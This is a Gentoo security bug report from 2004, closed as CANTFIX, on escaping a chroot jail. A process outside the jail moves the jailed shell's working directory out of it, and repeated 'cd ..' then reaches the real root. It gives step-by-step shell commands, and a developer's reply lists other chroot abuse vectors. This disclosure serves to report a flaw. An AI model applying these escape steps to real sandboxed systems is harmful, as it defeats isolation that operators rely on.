Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 48872 - Escaping from chroot with help from outside by moving out current working directory
Summary: Escaping from chroot with help from outside by moving out current working dir...
Status: RESOLVED CANTFIX
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: High major (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2004-04-24 05:13 UTC by Tim Weber
Modified: 2011-10-30 22:38 UTC (History)
0 users

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tim Weber 2004-04-24 05:13:38 UTC
It looks to me that it is possible to escape from a chroot jail with help from outside. Specifically, when someone not inside the chroot moves out the current working directory of someone inside the chroot, the guy inside can use multiple "cd .."'s to finally get to the real root directory.

Reproducible: Always
Steps to Reproduce:
1. Create a directory called "/new" and copy a Gentoo stage1 tarball inside to make it somewhat usable. Create a directory called "/new.store"
2. Open up two root shells. (Maybe this works with user shells as well, didn't try it.)
3. Do the following commands in shell A:
serv0r root # cd / 
serv0r / # chroot /new /bin/bash 
serv0r / # cd usr 
serv0r usr # mkdir escape 
serv0r usr # cd escape
4. Do the following command in shell B:
serv0r root # mv /new/usr/escape /new.store/
5. Do the following commands in shell A:
serv0r escape # ls 
serv0r escape # pwd 
/usr/escape 
serv0r escape # cd .. 
serv0r new.store # ls 
escape  usr 
serv0r new.store # pwd 
/new.store
Actual Results:  
As you can see, the chrooted shell A can now access the directory 
"/new.store". By using "cd .." again he would be able to change to the real 
root directory, despite being chrooted to "/new". 

Expected Results:  
Either 
a) Disallow the "mv" of the current working directory of shell A's user or 
b) Put shell A's user inside "/usr" (which in fact is "/new/usr") after the 
"cd ..". 

I've posted this about one or two weeks ago in the forums 
(http://forums.gentoo.org/viewtopic.php?t=160772), but didn't have time to 
file a bug report. 
 
This has NOT been tested with up-to-date software, but was reproduced by 
forums moderator tomk, I guess he was using current packages. 
 
I was using chroot 5.0 (from coreutils-5.0-r5) and some older kernel (about 
2.4.22). Sorry I didn't check the precise kernel version, but I had very 
little time at that moment.
Comment 1 solar (RETIRED) gentoo-dev 2004-04-24 09:22:26 UTC
We can't fix this.
What your talking about goes into the fundamental design of the kernel.

Note; There are also other ways to abuse a default chroot setup that don't require
external forces to help you including iopl, shmat, ptrace, kill, mount, fchdir, 
AF_UNIX sockets, chmod, mknod.

Changing resolution to CANTFIX
If you feel that we can fix this somehow then please attach a patch and reopen.